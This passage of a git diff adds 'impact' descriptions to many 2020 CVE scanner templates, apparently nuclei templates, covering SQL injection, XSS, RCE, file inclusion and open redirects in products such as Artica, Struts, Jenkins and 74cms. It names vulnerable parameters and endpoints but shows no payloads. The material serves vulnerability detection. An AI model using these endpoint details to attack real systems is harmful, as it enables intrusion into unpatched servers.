this issue exists because of an incomplete fix for CVE-2019-16759.' + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system. remediation: | Upgrade vBulletin to a version that is not affected by CVE-2020-17496. reference: diff --git a/http/cves/2020/CVE-2020-17505.yaml b/http/cves/2020/CVE-2020-17505.yaml index 5ae63f48fe..45775cf025 100644 
--- a/http/cves/2020/CVE-2020-17505.yaml +++ b/http/cves/2020/CVE-2020-17505.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: high description: Artica Web Proxy 4.30 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the confidentiality, integrity, and availability of the affected system. remediation: | Upgrade to a patched version of Artica Web Proxy or apply the vendor-supplied patch to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-17506.yaml b/http/cves/2020/CVE-2020-17506.yaml index f2772e384e..b4f21662eb 100644 --- a/http/cves/2020/CVE-2020-17506.yaml +++ b/http/cves/2020/CVE-2020-17506.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass authentication and execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. remediation: | Upgrade to a patched version of Artica Web Proxy or apply the vendor-supplied patch to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-17518.yaml b/http/cves/2020/CVE-2020-17518.yaml index 8ccdfb2ec2..04c261f6e8 100644 --- a/http/cves/2020/CVE-2020-17518.yaml +++ b/http/cves/2020/CVE-2020-17518.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Apache Flink 1.5.1 is vulnerable to local file inclusion because of a REST handler that allows file uploads to an arbitrary location on the local file system through a maliciously modified HTTP HEADER. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server. remediation: | Upgrade Apache Flink to a version that is not affected by the vulnerability (1.5.2 or later). reference: diff --git a/http/cves/2020/CVE-2020-17526.yaml b/http/cves/2020/CVE-2020-17526.yaml index c4416221a8..4d58fa9eb2 100644 --- a/http/cves/2020/CVE-2020-17526.yaml +++ b/http/cves/2020/CVE-2020-17526.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Apache Airflow prior to 1.10.14 contains an authentication bypass vulnerability via incorrect session validation with default configuration. An attacker on site A can access unauthorized Airflow on site B through the site A session. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or unauthorized execution of arbitrary code. remediation: Change default value for [webserver] secret_key config. reference: - https://kloudle.com/academy/authentication-bypass-in-apache-airflow-cve-2020-17526-and-aws-cloud-platform-compromise diff --git a/http/cves/2020/CVE-2020-17530.yaml b/http/cves/2020/CVE-2020-17530.yaml index 74ac02cae8..2d3b72ffde 100644 --- a/http/cves/2020/CVE-2020-17530.yaml +++ b/http/cves/2020/CVE-2020-17530.yaml 
@@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Apache Struts 2.0.0 through Struts 2.5.25 is susceptible to remote code execution because forced OGNL evaluation, when evaluated on raw user input in tag attributes, may allow it. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected server. remediation: | Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts. reference: diff --git a/http/cves/2020/CVE-2020-18268.yaml b/http/cves/2020/CVE-2020-18268.yaml index 6a29e60c9e..20294b8446 100644 --- a/http/cves/2020/CVE-2020-18268.yaml +++ b/http/cves/2020/CVE-2020-18268.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Z-Blog 1.5.2 and earlier contains an open redirect vulnerability via the redirect parameter in zb_system/cmd.php. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the execution of further attacks. remediation: | Upgrade Z-Blog to version 1.5.3 or later to fix the open redirect vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-19282.yaml b/http/cves/2020/CVE-2020-19282.yaml index 1da9daeaed..f3b32f7281 100644 --- a/http/cves/2020/CVE-2020-19282.yaml +++ b/http/cves/2020/CVE-2020-19282.yaml 
@@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Jeesns 1.4.2 is vulnerable to reflected cross-site scripting that allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of Jeesns or apply the vendor-provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-19283.yaml b/http/cves/2020/CVE-2020-19283.yaml index b4bc6e8dc8..db9181b457 100644 --- a/http/cves/2020/CVE-2020-19283.yaml +++ b/http/cves/2020/CVE-2020-19283.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Jeesns 1.4.2 is vulnerable to reflected cross-site scripting in the /newVersion component and allows attackers to execute arbitrary web scripts or HTML. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in a victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade Jeesns to the latest version or apply the vendor-provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-19295.yaml b/http/cves/2020/CVE-2020-19295.yaml index 5caf4140db..59b73d754f 100644 --- a/http/cves/2020/CVE-2020-19295.yaml +++ b/http/cves/2020/CVE-2020-19295.yaml 
@@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Jeesns 1.4.2 is vulnerable to reflected cross-site scripting in the /weibo/topic component and allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade Jeesns to the latest version or apply the vendor-provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-19360.yaml b/http/cves/2020/CVE-2020-19360.yaml index fe67f8f9bf..55d407ba3d 100644 --- a/http/cves/2020/CVE-2020-19360.yaml +++ b/http/cves/2020/CVE-2020-19360.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: FHEM version 6.0 suffers from a local file inclusion vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the target system. remediation: | Apply the latest patch or upgrade to a version that is not affected by the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-1943.yaml b/http/cves/2020/CVE-2020-1943.yaml index 09fcc03314..f666b0a2b3 100644 --- a/http/cves/2020/CVE-2020-1943.yaml +++ b/http/cves/2020/CVE-2020-1943.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: Apache OFBiz 16.11.01 to 16.11.07 is vulnerable to cross-site scripting because data sent with contentId to /control/stream is not sanitized. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade Apache OFBiz to a version higher than 16.11.07 to mitigate this vulnerability. reference: 
diff --git a/http/cves/2020/CVE-2020-19515.yaml b/http/cves/2020/CVE-2020-19515.yaml index 1ea948259b..e5cde90d2a 100644 --- a/http/cves/2020/CVE-2020-19515.yaml +++ b/http/cves/2020/CVE-2020-19515.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | qdPM V9.1 is vulnerable to Cross Site Scripting (XSS) via qdPM\install\modules\database_config.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by the vendor. reference: diff --git a/http/cves/2020/CVE-2020-1956.yaml b/http/cves/2020/CVE-2020-1956.yaml index 611ebe8655..99a3eacb6d 100644 --- a/http/cves/2020/CVE-2020-1956.yaml +++ b/http/cves/2020/CVE-2020-1956.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Apache Kylin 2.3.0, and releases up to 2.6.5 and 3.0.1 has some restful apis which will concatenate os command with the user input string, a user is likely to be able to execute any os command without any protection or validation. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution and potential compromise of the affected server. remediation: | Upgrade to a patched version of Apache Kylin or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2020/CVE-2020-19625.yaml b/http/cves/2020/CVE-2020-19625.yaml index a6d166a2d1..4c09af3dc0 100644 --- a/http/cves/2020/CVE-2020-19625.yaml +++ b/http/cves/2020/CVE-2020-19625.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | Gridx 1.3 is susceptible to remote code execution via tests/support/stores/test_grid_filter.php, which allows remote attackers to execute arbitrary code via crafted values submitted to the $query parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patch or upgrade to a non-vulnerable version of Gridx. reference: diff --git a/http/cves/2020/CVE-2020-20285.yaml b/http/cves/2020/CVE-2020-20285.yaml index 806b6b7faf..6f2b1ad4ab 100644 --- a/http/cves/2020/CVE-2020-20285.yaml +++ b/http/cves/2020/CVE-2020-20285.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | ZZcms 2019 contains a cross-site scripting vulnerability in the user login page. An attacker can inject arbitrary JavaScript code in the referer header via user/login.php, which can allow theft of cookie-based credentials and launch of subsequent attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-20300.yaml b/http/cves/2020/CVE-2020-20300.yaml index 8af090779c..c9c69f7d72 100644 --- a/http/cves/2020/CVE-2020-20300.yaml +++ b/http/cves/2020/CVE-2020-20300.yaml 
@@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: WeiPHP 5.0 contains a SQL injection vulnerability via the wp_where function. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to a patched version of WeiPHP or apply the vendor-supplied patch to fix the SQL Injection vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-2036.yaml b/http/cves/2020/CVE-2020-2036.yaml index 4dd46fb321..7427955ef2 100644 --- a/http/cves/2020/CVE-2020-2036.yaml +++ b/http/cves/2020/CVE-2020-2036.yaml @@ -6,6 +6,8 @@ info: severity: high description: | PAN-OS management web interface is vulnerable to reflected cross-site scripting. A remote attacker able to convince an administrator with an active authenticated session on the firewall management interface to click on a crafted link to that management web interface could potentially execute arbitrary JavaScript code in the administrator's browser and perform administrative actions. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.16; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by Palo Alto Networks to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-2096.yaml b/http/cves/2020/CVE-2020-2096.yaml index ca23cd55e7..9022e7533c 100644 --- a/http/cves/2020/CVE-2020-2096.yaml +++ b/http/cves/2020/CVE-2020-2096.yaml 
@@ -5,6 +5,8 @@ info: author: madrobot severity: medium description: Jenkins Gitlab Hook 1.4.2 and earlier does not escape project names in the build_now endpoint, resulting in a reflected cross-site scripting vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: | Upgrade to the latest version of Jenkins Gitlab Hook plugin (>=1.4.3) to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-20982.yaml b/http/cves/2020/CVE-2020-20982.yaml index c1cfbcad26..06c5500544 100644 --- a/http/cves/2020/CVE-2020-20982.yaml +++ b/http/cves/2020/CVE-2020-20982.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu,ritikchaddha severity: critical description: shadoweb wdja v1.5.1 is susceptible to cross-site scripting because it allows attackers to execute arbitrary code and gain escalated privileges via the backurl parameter to /php/passport/index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-20988.yaml b/http/cves/2020/CVE-2020-20988.yaml index f9d1805d4b..c795525157 100644 --- a/http/cves/2020/CVE-2020-20988.yaml +++ b/http/cves/2020/CVE-2020-20988.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD 4.13.0 is vulnerable to cross-site scripting via reporting/domains/cost-by-owner.php in the "or Expiring Between" parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-21012.yaml b/http/cves/2020/CVE-2020-21012.yaml index 31aa6b5250..3acb0b9e3e 100644 --- a/http/cves/2020/CVE-2020-21012.yaml +++ b/http/cves/2020/CVE-2020-21012.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Sourcecodester Hotel and Lodge Management System 2.0 contains a SQL injection vulnerability via the email parameter to the edit page for Customer, Room, Currency, Room Booking Details, or Tax Details. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Sourcecodester Hotel and Lodge Management System 2.0. reference: diff --git a/http/cves/2020/CVE-2020-2103.yaml b/http/cves/2020/CVE-2020-2103.yaml index 8a063330c4..5e9e77c62d 100644 --- a/http/cves/2020/CVE-2020-2103.yaml +++ b/http/cves/2020/CVE-2020-2103.yaml 
@@ -5,6 +5,8 @@ info: author: c-sh0 severity: medium description: Jenkins through 2.218, LTS 2.204.1 and earlier, is susceptible to information disclosure. An attacker can access exposed session identifiers on a user detail object in the whoAmI diagnostic page and thus potentially access sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the Jenkins server. remediation: | Upgrade Jenkins to a version higher than 2.218 to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-21224.yaml b/http/cves/2020/CVE-2020-21224.yaml index bdfaa3731c..a3f5ab8fd1 100644 --- a/http/cves/2020/CVE-2020-21224.yaml +++ b/http/cves/2020/CVE-2020-21224.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Inspur ClusterEngine V4.0 is suscptible to a remote code execution vulnerability. A remote attacker can send a malicious login packet to the control server. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches or updates provided by Inspur to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-2140.yaml b/http/cves/2020/CVE-2020-2140.yaml index 65a34b9dac..0a004745cb 100644 --- a/http/cves/2020/CVE-2020-2140.yaml +++ b/http/cves/2020/CVE-2020-2140.yaml 
@@ -5,6 +5,8 @@ info: author: j3ssie/geraldino2 severity: medium description: Jenkins Audit Trail 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a reflected cross-site scripting vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade to the latest version of Jenkin Audit Trail (>=3.3) which includes a fix for this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-22208.yaml b/http/cves/2020/CVE-2020-22208.yaml index 7eb9054678..992f75f209 100644 --- a/http/cves/2020/CVE-2020-22208.yaml +++ b/http/cves/2020/CVE-2020-22208.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | SQL Injection in 74cms 3.2.0 via the x parameter to plus/ajax_street.php. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the underlying database. remediation: | Apply the vendor-provided patch or update to the latest version of 74cms to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-22209.yaml b/http/cves/2020/CVE-2020-22209.yaml index 09c908ab34..016f813644 100644 --- a/http/cves/2020/CVE-2020-22209.yaml +++ b/http/cves/2020/CVE-2020-22209.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | SQL Injection in 74cms 3.2.0 via the query parameter to plus/ajax_common.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the underlying database. remediation: | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the 74cms - ajax_common.php file. reference: diff --git a/http/cves/2020/CVE-2020-22210.yaml b/http/cves/2020/CVE-2020-22210.yaml index 217e04baed..260f54ebef 100644 
--- a/http/cves/2020/CVE-2020-22210.yaml +++ b/http/cves/2020/CVE-2020-22210.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A SQL injection vulnerability exists in 74cms 3.2.0 via the x parameter to ajax_officebuilding.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the 74cms - ajax_officebuilding.php file. reference: diff --git a/http/cves/2020/CVE-2020-22211.yaml b/http/cves/2020/CVE-2020-22211.yaml index efff98cc7a..b810c304cc 100644 --- a/http/cves/2020/CVE-2020-22211.yaml +++ b/http/cves/2020/CVE-2020-22211.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | SQL Injection in 74cms 3.2.0 via the key parameter to plus/ajax_street.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the 'key' parameter of ajax_street.php in 74cms. reference: diff --git a/http/cves/2020/CVE-2020-22840.yaml b/http/cves/2020/CVE-2020-22840.yaml index a7f2e41d12..7e39ade64f 100644 --- a/http/cves/2020/CVE-2020-22840.yaml +++ b/http/cves/2020/CVE-2020-22840.yaml 
@@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: b2evolution CMS before 6.11.6 contains an open redirect vulnerability via the redirect_to parameter in email_passthrough.php. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + This vulnerability can be exploited by attackers to trick users into visiting malicious websites, potentially leading to phishing attacks, malware infections, or unauthorized access to sensitive information. remediation: | Upgrade b2evolution CMS to version 6.11.6 or later to mitigate the open redirect vulnerability (CVE-2020-22840). reference: diff --git a/http/cves/2020/CVE-2020-23015.yaml b/http/cves/2020/CVE-2020-23015.yaml index 11ef657d5d..cf6a863322 100644 --- a/http/cves/2020/CVE-2020-23015.yaml +++ b/http/cves/2020/CVE-2020-23015.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: OPNsense through 20.1.5 contains an open redirect vulnerability via the url redirect parameter in the login page, which is not filtered. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability could allow an attacker to redirect users to malicious websites, leading to phishing attacks or the disclosure of sensitive information. remediation: | Upgrade OPNsense to a version higher than 20.1.5 to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-23517.yaml b/http/cves/2020/CVE-2020-23517.yaml index 4c8e227cbc..7c1a2b1fdf 100644 --- a/http/cves/2020/CVE-2020-23517.yaml +++ b/http/cves/2020/CVE-2020-23517.yaml 
@@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: A cross-site scripting vulnerability in Aryanic HighMail (High CMS) versions 2020 and before allows remote attackers to inject arbitrary web script or HTML, via 'user' to LoginForm. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: diff --git a/http/cves/2020/CVE-2020-23575.yaml b/http/cves/2020/CVE-2020-23575.yaml index ae373f2b32..fe8cfb89f7 100644 --- a/http/cves/2020/CVE-2020-23575.yaml +++ b/http/cves/2020/CVE-2020-23575.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Kyocera Printer d-COPIA253MF plus is susceptible to a directory traversal vulnerability which could allow an attacker to retrieve or view arbitrary files from the affected server. + impact: | + An attacker can exploit this vulnerability to read arbitrary files from the server, potentially leading to unauthorized access or sensitive information disclosure. remediation: | Apply the latest firmware update provided by Kyocera to fix the directory traversal vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-23697.yaml b/http/cves/2020/CVE-2020-23697.yaml index bde9d3a077..93743500cd 100644 --- a/http/cves/2020/CVE-2020-23697.yaml +++ b/http/cves/2020/CVE-2020-23697.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Monstra CMS 3.0.4 contains a cross-site scripting vulnerability via the page feature in admin/index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of Monstra CMS or apply the vendor-provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-23972.yaml b/http/cves/2020/CVE-2020-23972.yaml index e2f48aa54e..e98cf9ec71 100644 --- a/http/cves/2020/CVE-2020-23972.yaml +++ b/http/cves/2020/CVE-2020-23972.yaml @@ -7,6 +7,8 @@ info: description: | Joomla! Component GMapFP 3.5 is vulnerable to arbitrary file upload vulnerabilities. An attacker can access the upload function of the application without authentication and can upload files because of unrestricted file upload which can be bypassed by changing Content-Type & name file too double ext. + impact: | + Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected Joomla! website. remediation: | Apply the latest security patch or update to a patched version of Joomla! Component GMapFP 3.5 to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-24148.yaml b/http/cves/2020/CVE-2020-24148.yaml index 27f69539a8..f262ef755d 100644 --- a/http/cves/2020/CVE-2020-24148.yaml +++ b/http/cves/2020/CVE-2020-24148.yaml 
@@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: WordPress plugin Import XML and RSS Feeds (import-xml-feed) plugin 2.0.1 contains a server-side request forgery (SSRF) vulnerability via the data parameter in a moove_read_xml action. + impact: | + An attacker can exploit this vulnerability to make requests to internal resources, potentially leading to unauthorized access or information disclosure. remediation: | Update to the latest version of the Import XML & RSS Feeds WordPress Plugin (2.0.2 or higher) to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-24186.yaml b/http/cves/2020/CVE-2020-24186.yaml index 995f9d2854..c5d81d8d85 100644 --- a/http/cves/2020/CVE-2020-24186.yaml +++ b/http/cves/2020/CVE-2020-24186.yaml @@ -5,6 +5,8 @@ info: author: Ganofins severity: critical description: WordPress wpDiscuz plugin versions version 7.0 through 7.0.4 are susceptible to remote code execution. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site's server. + impact: | + Successful exploitation of this vulnerability can lead to arbitrary code execution on the affected WordPress site. remediation: | Update the wpDiscuz plugin to the latest version (>=7.0.5) to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-24223.yaml b/http/cves/2020/CVE-2020-24223.yaml index 6e44d5d758..928b9bfeb6 100644 --- a/http/cves/2020/CVE-2020-24223.yaml +++ b/http/cves/2020/CVE-2020-24223.yaml 
@@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Mara CMS 7.5 allows reflected cross-site scripting in contact.php via the theme or pagetheme parameters. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of Mara CMS or apply the vendor-provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-24312.yaml b/http/cves/2020/CVE-2020-24312.yaml index d0cd5918f6..28919168dd 100644 --- a/http/cves/2020/CVE-2020-24312.yaml +++ b/http/cves/2020/CVE-2020-24312.yaml @@ -6,6 +6,8 @@ info: severity: high description: | mndpsingh287 WP File Manager v6.4 and lower fails to restrict external access to the fm_backups directory with a .htaccess file. This results in the ability for unauthenticated users to browse and download any site backups, which sometimes include full database backups, that the plugin has taken. + impact: | + This vulnerability can lead to unauthorized access to sensitive information, such as database backups, configuration files, and other sensitive data. remediation: | Update the WordPress Plugin File Manager (wp-file-manager) to the latest version to mitigate the backup disclosure vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-24391.yaml b/http/cves/2020/CVE-2020-24391.yaml index b37e74a5aa..3366326dd3 100644 --- a/http/cves/2020/CVE-2020-24391.yaml +++ b/http/cves/2020/CVE-2020-24391.yaml 
@@ -5,6 +5,8 @@ info: author: leovalcante severity: critical description: Mongo-Express before 1.0.0 is susceptible to remote code execution because it uses safer-eval to validate user supplied javascript. Unfortunately safer-eval sandboxing capabilities are easily bypassed leading to remote code execution in the context of the node server. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches or updates provided by the vendor to fix this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-24550.yaml b/http/cves/2020/CVE-2020-24550.yaml index cc63c5916d..916442cfa1 100644 --- a/http/cves/2020/CVE-2020-24550.yaml +++ b/http/cves/2020/CVE-2020-24550.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: EpiServer Find before 13.2.7 contains an open redirect vulnerability via the _t_redirect parameter in a crafted URL, such as a /find_v2/_click URL. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks. remediation: | Upgrade to EpiServer Find version 13.2.7 or later to fix the open redirect vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-24571.yaml b/http/cves/2020/CVE-2020-24571.yaml index 5fe89d1bd5..d7f0c2c6a9 100644 --- a/http/cves/2020/CVE-2020-24571.yaml +++ b/http/cves/2020/CVE-2020-24571.yaml 
@@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: NexusQA NexusDB before 4.50.23 allows the reading of files via ../ directory traversal and local file inclusion. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data. remediation: | Upgrade NexusDB to version 4.50.23 or later to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-24579.yaml b/http/cves/2020/CVE-2020-24579.yaml index 7e9385f988..ef4edd1a2e 100644 --- a/http/cves/2020/CVE-2020-24579.yaml +++ b/http/cves/2020/CVE-2020-24579.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55 are vulnerable to authentication bypass issues which can lead to remote command execution. An unauthenticated attacker could bypass authentication to access authenticated pages and functionality. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass authentication and execute arbitrary commands on the affected router. remediation: | Apply the latest firmware update provided by D-Link to fix the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-24589.yaml b/http/cves/2020/CVE-2020-24589.yaml index 716d2d5624..7c04a98160 100644 --- a/http/cves/2020/CVE-2020-24589.yaml +++ b/http/cves/2020/CVE-2020-24589.yaml 
@@ -5,6 +5,8 @@ info: author: lethargynavigator severity: critical description: WSO2 API Manager 3.1.0 and earlier is vulnerable to blind XML external entity injection (XXE). XXE often allows an attacker to view files on the server file system, and to interact with any backend or external systems that the application itself can access which allows the attacker to transmit sensitive data from the compromised server to a system that the attacker controls. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, denial of service, or server-side request forgery. remediation: | Upgrade to a patched version of WSO2 API Manager (3.1.1 or above) or apply the provided security patch. reference: diff --git a/http/cves/2020/CVE-2020-24902.yaml b/http/cves/2020/CVE-2020-24902.yaml index 478c2ec415..85b52b1300 100644 --- a/http/cves/2020/CVE-2020-24902.yaml +++ b/http/cves/2020/CVE-2020-24902.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Quixplorer through 2.4.1 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to a patched version of Quixplorer (>=2.4.2) or apply the vendor-supplied patch to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-24903.yaml b/http/cves/2020/CVE-2020-24903.yaml index 3be41411bd..9f0a7a9aba 100644 --- a/http/cves/2020/CVE-2020-24903.yaml +++ b/http/cves/2020/CVE-2020-24903.yaml 
